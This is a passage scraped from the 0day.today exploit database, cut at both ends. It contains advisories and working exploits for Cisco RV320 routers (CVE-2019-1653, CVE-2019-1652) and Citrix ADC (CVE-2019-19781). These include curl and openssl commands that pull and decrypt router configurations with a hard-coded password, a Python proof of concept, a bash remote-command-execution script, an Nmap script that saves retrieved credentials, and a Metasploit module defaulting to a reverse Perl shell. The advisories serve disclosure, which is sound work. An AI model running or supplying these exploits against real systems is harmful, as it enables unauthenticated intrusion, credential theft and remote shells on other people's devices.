program:\r\n\r\n/cgi-bin/export_debug_msg.exp\r\n\r\nThis program can be used to retrieve various diagnostic information from\r\nthe device, which includes its current configuration. In contrast to\r\nother functions, this CGI program does not require any form of\r\nauthentication. 
It may be accessed through the router's web server,\r\nwhich is available from the LAN by default. As described in [2],\r\nfirmware versions from 1.4.2 to 1.4.2.15 (including) also expose the web\r\nserver to the WAN on TCP port 8007.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe diagnostic data can be retrieved by issuing an HTTP POST request to\r\nthe vulnerable CGI program. OpenSSL is used to decrypt the data with the\r\nhard-coded password \"NKDebug12#$%\" before unpacking it with tar (output\r\nshortened):\r\n\r\n------------------------------------------------------------------------\r\n$ curl --data submitdebugmsg=1 \\\r\n 'http://192.168.1.1/cgi-bin/export_debug_msg.exp' > debug\r\n\r\n$ openssl aes-128-cbc -salt -md md5 -d \\\r\n -k 'NKDebug12#$%' < debug > debug.tgz\r\n\r\n$ mkdir output && tar -xf debug.tgz -C output/\r\n\r\n$ ls -1 output/\r\ndebug_messages.txt\r\netc.tgz\r\nnk_sysconfig\r\nvar.tgz\r\n\r\n$ cat output/nk_sysconfig\r\n####sysconfig####\r\n[VERSION]\r\nVERSION=73\r\nMODEL=RV320\r\nSSL=0\r\nIPSEC=0\r\nPPTP=0\r\nPLATFORMCODE=RV0XX\r\n[...]\r\n[SYSTEM]\r\nHOSTNAME=router\r\nDOMAINNAME=example.com\r\nDOMAINCHANGE=1\r\nUSERNAME=cisco\r\nPASSWD=066bae9070a9a95b3e03019db131cd40\r\n[...]\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nPrevent untrusted clients from connecting to the device's web server.\r\n\r\n\r\nFix\r\n===\r\n\r\nInstall firmware version 1.4.2.19 (or later) on the router.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThis vulnerability is rated as a high risk as it exposes sensitive\r\ndiagnostic information, such as the device's configuration, to\r\nuntrusted, potentially malicious parties. By retrieving this\r\ninformation, attackers can obtain internal network configuration, VPN or\r\nIPsec secrets, as well as password hashes for the router's user\r\naccounts. 
Knowledge of a user's password hash is sufficient to log into\r\nthe router's web interface. Any information obtained through\r\nexploitation of this vulnerability can be used to facilitate further\r\ncompromise of the device itself or attached networks.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2018-09-19 Vulnerability identified\r\n2018-09-27 Customer approved disclosure to vendor\r\n2018-09-28 Vendor notified\r\n2018-10-05 Receipt of advisory acknowledged by vendor\r\n2018-10-05 Notified vendor of disclosure date: 2019-01-09\r\n2018-11-18 List of affected versions provided by vendor\r\n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor\r\n2019-01-23 Advisory published\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html\r\n[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801\n\n# 0day.today [2019-02-06] #", "sourceHref": "https://0day.today/exploit/32052", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-25T04:16:34", "description": "Exploit for hardware platform in category web applications", "cvss3": {}, "published": "2019-01-28T00:00:00", "type": "zdt", "title": "Cisco RV300 / RV320 - Information Disclosure Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-01-28T00:00:00", "id": "1337DAY-ID-32070", "href": "https://0day.today/exploit/description/32070", "sourceData": "# Exploit Title: Cisco RV300 / RV320 - Information Disclosure Vulnerability\r\n# Exploit Author: Harom Ramos [Horus]\r\n# Tested on: Cisco RV300/RV320\r\n# CVE : CVE-2019-1653\r\n\r\nimport requests\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nfrom fake_useragent import UserAgent\r\n\r\ndef random_headers():\r\n return dict({'user-agent': UserAgent().random})\r\n\r\ndef request(url):\r\n r = requests.Session()\r\n try:\r\n get = r.get(url, headers = random_headers(), timeout = 5, 
verify=False)#, allow_redirects=False\r\n if get.status_code == 200: \r\n return get.text \r\n except requests.ConnectionError:\r\n return 'Error Conecting'\r\n except requests.Timeout:\r\n\t return 'Error Timeout'\r\n except KeyboardInterrupt:\r\n raise \r\n except:\r\n return 0\r\n\r\nprint(\"\") \r\nprint(\"##################################################\")\r\nprint(\"CISCO CVE-2019-1653 POC\")\r\nprint(\"From H. with love\")\r\nprint(\"\")\r\n\r\nurl = raw_input(\"URL> EX:http://url:port/ \") \r\nurl = url + \"/cgi-bin/config.exp\"\r\nprint(request(url))\n\n# 0day.today [2019-02-25] #", "sourceHref": "https://0day.today/exploit/32070", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-03-30T17:27:53", "description": "Cisco RV320 router still exposes sensitive diagnostic data without authentication via the device's web interface due to an inadequate fix by the vendor.", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "zdt", "title": "Cisco RV320 Unauthenticated Diagnostic Data Retrieval Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-03-27T00:00:00", "id": "1337DAY-ID-32438", "href": "https://0day.today/exploit/description/32438", "sourceData": "Cisco RV320 Unauthenticated Diagnostic Data Retrieval Vulnerability\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others\r\nAffected Versions: 1.4.2.15 through 1.4.2.20\r\nFixed Versions: none\r\nVulnerability Type: Information Disclosure\r\nSecurity Risk: high\r\nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info\r\nVendor Status: working on patch\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-004\r\nAdvisory Status: published\r\nCVE: CVE-2019-1653\r\nCVE URL: 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"Keep your employees, your business, and yourself productive and\r\neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal\r\nchoice for any small office or small business looking for performance,\r\nsecurity, and reliability in its network.\"\r\n(from the Cisco RV320 product page [1])\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based\r\nconfiguration interface, which is implemented in various CGI programs in\r\nthe device's firmware. Access to this web interface requires prior\r\nauthentication using a username and password. Previously, RedTeam\r\nPentesting identified a vulnerability (rt-sa-2018-003) [2] in the CGI\r\nprogram:\r\n\r\n/cgi-bin/export_debug_msg.exp\r\n\r\nBy issuing an HTTP POST request to this program, it was possible to\r\nretrieve various diagnostic information from the device, including its\r\ncurrent configuration. This request did not require any prior\r\nauthentication. Cisco addressed this vulnerability in firmware version\r\n1.4.2.19 [3].\r\n\r\nRedTeam Pentesting discovered that the CGI program in the patched\r\nfirmware is still vulnerable. The user agent \"curl\" is blacklisted by\r\nthe firmware and must be adjusted in the HTTP client. Again,\r\nexploitation does not require any authentication.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe diagnostic data can be retrieved by issuing an HTTP POST request to\r\nthe vulnerable CGI program. 
OpenSSL is used to decrypt the data with the\r\nhard-coded password \"NKDebug12#$%\" before unpacking it with tar (output\r\nshortened):\r\n\r\n------------------------------------------------------------------------\r\n$ curl -k -A kurl -X POST --data 'submitdebugmsg=1' \\\r\n 'https://192.168.1.1/cgi-bin/export_debug_msg.exp' > debug\r\n\r\n$ openssl aes-128-cbc -salt -md md5 -d \\\r\n -k 'NKDebug12#$%' < debug > debug.tgz\r\n\r\n$ mkdir output && tar -xf debug.tgz -C output/\r\n\r\n$ ls -1 output/\r\ndebug_messages.txt\r\netc.tgz\r\nnk_sysconfig\r\nvar.tgz\r\n\r\n$ cat output/nk_sysconfig\r\n####sysconfig####\r\n[VERSION]\r\nVERSION=73\r\nMODEL=RV320\r\nSSL=0\r\nIPSEC=0\r\nPPTP=0\r\nPLATFORMCODE=RV0XX\r\n[...]\r\n[SYSTEM]\r\nHOSTNAME=router\r\nDOMAINNAME=example.com\r\nDOMAINCHANGE=1\r\nUSERNAME=cisco\r\nPASSWD=066bae9070a9a95b3e03019db131cd40\r\n[...]\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nPrevent untrusted clients from connecting to the device's web server.\r\n\r\n\r\nFix\r\n===\r\n\r\nNone\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThis vulnerability is rated as a high risk as it exposes sensitive\r\ndiagnostic information, such as the device's configuration, to\r\nuntrusted, potentially malicious parties. By retrieving this\r\ninformation, attackers can obtain internal network configuration, VPN or\r\nIPsec secrets, as well as password hashes for the router's user\r\naccounts. Knowledge of a user's password hash is sufficient to log into\r\nthe router's web interface, cracking of the hash is not required. 
Any\r\ninformation obtained through exploitation of this vulnerability can be\r\nused to facilitate further compromise of the device itself or attached\r\nnetworks.\n\n# 0day.today [2019-03-30] #", "sourceHref": "https://0day.today/exploit/32438", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-03-30T17:25:02", "description": "The configuration of a Cisco RV320 router can still be exported without authentication via the device's web interface due to an inadequate fix by the vendor.", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "zdt", "title": "Cisco RV320 Unauthenticated Configuration Export Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-03-27T00:00:00", "id": "1337DAY-ID-32439", "href": "https://0day.today/exploit/description/32439", "sourceData": "Cisco RV320 Unauthenticated Configuration Export Vulnerability\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others\r\nAffected Versions: 1.4.2.15 through 1.4.2.20\r\nFixed Versions: none\r\nVulnerability Type: Information Disclosure\r\nSecurity Risk: high\r\nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info\r\nVendor Status: working on patch\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-003\r\nAdvisory Status: published\r\nCVE: CVE-2019-1653\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"Keep your employees, your business, and yourself productive and\r\neffective. 
The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal\r\nchoice for any small office or small business looking for performance,\r\nsecurity, and reliability in its network.\"\r\n(from the Cisco RV320 product page [1])\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based\r\nconfiguration interface, which is implemented in various CGI programs in\r\nthe device's firmware. Access to this web interface requires prior\r\nauthentication using a username and password. Previously, RedTeam\r\nPentesting identified a vulnerability (rt-sa-2018-002) [2] in the CGI\r\nprogram:\r\n\r\n/cgi-bin/config.exp\r\n\r\nBy issuing an HTTP GET request to this program, it was possible to\r\nexport a router's configuration without providing any prior\r\nauthentication. This vulnerability was addressed in firmware version\r\n1.4.2.19 published by Cisco [3].\r\n\r\nRedTeam Pentesting discovered that the CGI program in the patched\r\nfirmware is still vulnerable. By performing a specially crafted HTTP\r\nPOST request, attackers are still able to download the router's\r\nconfiguration. The user agent \"curl\" is blacklisted by the firmware and\r\nmust be adjusted in the HTTP client. 
Again, exploitation does not\r\nrequire any authentication.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nA device's configuration can be retrieved by issuing an HTTP POST request\r\nto the vulnerable CGI program (output shortened):\r\n\r\n------------------------------------------------------------------------\r\n$ curl -s -k -A kurl -X POST --data 'submitbkconfig=0' \\\r\n 'https://192.168.1.1/cgi-bin/config.exp'\r\n####sysconfig####\r\n[VERSION]\r\nVERSION=73\r\nMODEL=RV320\r\nSSL=0\r\nIPSEC=0\r\nPPTP=0\r\nPLATFORMCODE=RV0XX\r\n[...]\r\n[SYSTEM]\r\nHOSTNAME=router\r\nDOMAINNAME=example.com\r\nDOMAINCHANGE=1\r\nUSERNAME=cisco\r\nPASSWD=066bae9070a9a95b3e03019db131cd40\r\n[...]\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nPrevent untrusted clients from connecting to the device's web server.\r\n\r\n\r\nFix\r\n===\r\n\r\nNone\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThis vulnerability is rated as a high risk as it exposes the device's\r\nconfiguration to untrusted, potentially malicious parties. By\r\ndownloading the configuration, attackers can obtain internal network\r\nconfiguration, VPN or IPsec secrets, as well as password hashes for the\r\nrouter's user accounts. Knowledge of a user's password hash is\r\nsufficient to log into the router's web interface, cracking of the hash\r\nis not required. 
Any information obtained through exploitation of this\r\nvulnerability can be used to facilitate further compromise of the device\r\nitself or attached networks.\n\n# 0day.today [2019-03-30] #", "sourceHref": "https://0day.today/exploit/32439", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-01-19T23:06:56", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2020-01-11T00:00:00", "type": "zdt", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution Vulnerability (1)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "1337DAY-ID-33794", "href": "https://0day.today/exploit/description/33794", "sourceData": "#!/bin/bash\r\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\r\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\r\n# Release Date : 11/01/2020\r\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\r\necho \"=================================================================================\r\n ___ _ _ ____ ___ _ _\r\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\r\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\r\n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\r\n |__/ CVE-2019-19781\r\n=================================================================================\"\r\n##############################\r\nif [ -z \"$1\" ];\r\nthen\r\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\r\nexit;\r\nfi\r\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\r\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d 
\"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\r\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\r\necho -ne \"Command Output :\\n\"\r\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\n\n# 0day.today [2020-01-19] #", "sourceHref": "https://0day.today/exploit/33794", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-19T23:02:20", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2020-01-16T00:00:00", "type": "zdt", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T00:00:00", "id": "1337DAY-ID-33824", "href": "https://0day.today/exploit/description/33824", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\r\n# CVE: CVE-2019-19781\r\n# Vulenrability: Path Traversal\r\n# Vulnerablity Discovery: Mikhail Klyuchnikov\r\n# Exploit Author: Dhiraj Mishra\r\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\r\n# Vendor Homepage: https://www.citrix.com/\r\n# References: https://support.citrix.com/article/CTX267027\r\n# https://github.com/nmap/nmap/pull/1893\r\n\r\nlocal http = require \"http\"\r\nlocal stdnse = require \"stdnse\"\r\nlocal shortport = require \"shortport\"\r\nlocal table = require \"table\"\r\nlocal string = require \"string\"\r\nlocal vulns = require \"vulns\"\r\nlocal nmap = 
require \"nmap\"\r\nlocal io = require \"io\"\r\n\r\ndescription = [[\r\nThis NSE script checks whether the traget server is vulnerable to\r\nCVE-2019-19781\r\n]]\r\n---\r\n-- @usage\r\n-- nmap --script https-citrix-path-traversal -p <port> <host>\r\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\r\noutput='file.txt'\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 443/tcp open http\r\n-- | CVE-2019-19781:\r\n-- | Host is vulnerable to CVE-2019-19781\r\n-- @changelog\r\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\r\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\r\n-- @xmloutput\r\n-- <table key=\"NMAP-1\">\r\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\r\n-- <elem key=\"state\">VULNERABLE</elem>\r\n-- <table key=\"description\">\r\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,\r\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\r\n-- traversal vulnerability that allows attackers to read configurations or\r\nany other file.\r\n-- </table>\r\n-- <table key=\"dates\">\r\n-- <table key=\"disclosure\">\r\n-- <elem key=\"year\">2019</elem>\r\n-- <elem key=\"day\">17</elem>\r\n-- <elem key=\"month\">12</elem>\r\n-- </table>\r\n-- </table>\r\n-- <elem key=\"disclosure\">17-12-2019</elem>\r\n-- <table key=\"extra_info\">\r\n-- </table>\r\n-- <table key=\"refs\">\r\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\r\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\r\n-- </table>\r\n-- </table>\r\n\r\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\r\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\r\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\r\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\r\n\r\nportrule = shortport.ssl\r\n\r\naction = function(host,port)\r\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\r\n local vuln = {\r\n title = 'Citrix ADC Path Traversal',\r\n state = 
vulns.STATE.NOT_VULN,\r\n description = [[\r\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\r\n12.1, and 13.0 are vulnerable\r\nto an unauthenticated path traversal vulnerability that allows attackers to\r\nread configurations or any other file.\r\n ]],\r\n references = {\r\n 'https://support.citrix.com/article/CTX267027',\r\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\r\n },\r\n dates = {\r\n disclosure = {year = '2019', month = '12', day = '17'},\r\n },\r\n }\r\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\r\n local path = \"/vpn/../vpns/cfg/smb.conf\"\r\n local response\r\n local output = {}\r\n local success = \"Host is vulnerable to CVE-2019-19781\"\r\n local fail = \"Host is not vulnerable\"\r\n local match = \"[global]\"\r\n local credentials\r\n local citrixADC\r\n response = http.get(host, port.number, path)\r\n\r\n if not response.status then\r\n stdnse.print_debug(\"Request Failed\")\r\n return\r\n end\r\n if response.status == 200 then\r\n -- plain find: as a Lua pattern, \"[global]\" is a character class and would match almost any body\r\n if string.find(response.body, match, 1, true) then\r\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\r\nSCRIPT_NAME,host.targetname or host.ip, path)\r\n vuln.state = vulns.STATE.VULN\r\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\r\nor host.ip,port.number, path))\r\n if outputFile then\r\n credentials = response.body:gsub('%W','.')\r\nvuln.check_results = stdnse.format_output(true, citrixADC)\r\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being stored in the output file\")\r\nlocal file = io.open(outputFile, \"a\")\r\nfile:write(credentials, \"\\n\")\r\nfile:close()\r\n else\r\n vuln.check_results = stdnse.format_output(true, citrixADC)\r\n end\r\n end\r\n elseif response.status == 403 then\r\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\r\nor host.ip, path, response.status)\r\n vuln.state = vulns.STATE.NOT_VULN\r\n end\r\n\r\n return vuln_report:make_output(vuln)\r\nend\n\n# 0day.today [2020-01-19] #", 
"sourceHref": "https://0day.today/exploit/33824", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-19T23:04:26", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2020-01-13T00:00:00", "type": "zdt", "title": "Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "1337DAY-ID-33806", "href": "https://0day.today/exploit/description/33806", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Citrix ADC Remote Code Execution',\r\n 'Description' => %q(\r\n An issue was discovered in Citrix Application Delivery Controller (ADC)\r\n and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. 
They allow Directory Traversal.\r\n ),\r\n 'Author' => [\r\n 'RAMELLA S\u00e9bastien' # https://www.pirates.re/\r\n ],\r\n 'References' => [\r\n ['CVE', '2019-19781'],\r\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\r\n ['EDB', '47901'],\r\n ['EDB', '47902']\r\n ],\r\n 'DisclosureDate' => '2019-12-17',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl meterpreter'\r\n }\r\n },\r\n 'Targets' => [\r\n ['Unix (remote shell)',\r\n 'Type' => :cmd_shell,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/reverse_perl',\r\n 'DisablePayloadHandler' => 'false'\r\n }\r\n ],\r\n ['Unix (command-line)',\r\n 'Type' => :cmd_generic,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/generic',\r\n 'DisablePayloadHandler' => 'true'\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\r\n }\r\n ))\r\n\r\n register_options([\r\n OptAddress.new('RHOST', [true, 'The target address'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false])\r\n ])\r\n\r\n deregister_options('RHOSTS')\r\n end\r\n\r\n def execute_command(command, opts = {})\r\n filename = Rex::Text.rand_text_alpha(16)\r\n nonce = Rex::Text.rand_text_alpha(6)\r\n\r\n request = {\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),\r\n 'headers' => {\r\n 'NSC_USER' => '../../../netscaler/portal/templates/' + filename,\r\n 'NSC_NONCE' => nonce\r\n },\r\n 'vars_post' => {\r\n 'url' => 'http://127.0.0.1',\r\n 'title' => \"[% template.new({'BLOCK'='print 
readpipe(#{get_chr_payload(command)})'})%]\",\r\n 'desc' => 'desc',\r\n 'UI_inuse' => 'RfWeb'\r\n },\r\n 'encode_params' => false\r\n }\r\n\r\n begin\r\n received = send_request_cgi(request)\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n return false unless received\r\n\r\n if received.code == 200\r\n vprint_status(\"#{received.get_html_document.text}\")\r\n sleep 2\r\n\r\n request = {\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),\r\n 'headers' => {\r\n 'NSC_USER' => nonce,\r\n 'NSC_NONCE' => nonce\r\n }\r\n }\r\n\r\n ## Trigger to gain exploitation.\r\n begin\r\n send_request_cgi(request)\r\n received = send_request_cgi(request)\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n return false unless received\r\n return received\r\n end\r\n\r\n return false\r\n end\r\n\r\n def get_chr_payload(command)\r\n chr_payload = command\r\n i = chr_payload.length\r\n\r\n output = \"\"\r\n chr_payload.each_char do | c |\r\n i = i - 1\r\n output << \"chr(\" << c.ord.to_s << \")\"\r\n if i != 0\r\n output << \" . \"\r\n end\r\n end\r\n\r\n return output\r\n end\r\n\r\n def check\r\n begin\r\n received = send_request_cgi(\r\n \"method\" => \"GET\",\r\n \"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')\r\n )\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n\r\n if received && received.code != 200\r\n return Exploit::CheckCode::Safe\r\n end\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n unless check.eql? 
Exploit::CheckCode::Vulnerable\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\r\n end\r\n else\r\n print_good('The target appears to be vulnerable.')\r\n end\r\n\r\n case target['Type']\r\n when :cmd_generic\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n\r\n received = execute_command(payload.encoded)\r\n if (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\")\r\n print_warning('Dumping command output in parsed http response')\r\n print_good(\"#{received.get_html_document.text}\")\r\n else\r\n print_warning('Empty response, no command output')\r\n return\r\n end\r\n\r\n when :cmd_shell\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n\r\n execute_command(payload.encoded)\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2020-01-19] #", "sourceHref": "https://0day.today/exploit/33806", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-03-30T17:25:29", "description": "Command injection vulnerability in the web-based certificate generator feature of the Cisco RV320 router which was inadequately patched by the vendor.", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "zdt", "title": "Cisco RV320 Command Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1652"], "modified": "2019-03-27T00:00:00", "id": "1337DAY-ID-32437", "href": "https://0day.today/exploit/description/32437", "sourceData": "Cisco RV320 Command Injection Vulnerability\r\n\r\nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others\r\nAffected Versions: 1.4.2.15 through 1.4.2.20\r\nFixed Versions: none\r\nVulnerability Type: Remote Code Execution\r\nSecurity Risk: medium\r\nVendor URL: 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject\r\nVendor Status: working on patch\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-005\r\nAdvisory Status: published\r\nCVE: CVE-2019-1652\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"Keep your employees, your business, and yourself productive and\r\neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal\r\nchoice for any small office or small business looking for performance,\r\nsecurity, and reliability in its network.\"\r\n(from the Cisco RV320 product page [1])\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe router's web interface enables users to generate new X.509\r\ncertificates directly on the device. Previously, RedTeam Pentesting\r\nidentified a vulnerability (rt-sa-2018-004) [2] in this component. By\r\nproviding a specially crafted common name, it was possible to inject\r\nshell commands which were subsequently executed on the router as the\r\nroot user. This vulnerability was addressed in firmware version 1.4.2.19\r\npublished by Cisco [3].\r\n\r\nRedTeam Pentesting discovered that the certificate generator in the patched\r\nfirmware is still vulnerable. The update adds several filters to handle\r\nsingle quotes in user input. However, these filters can be evaded 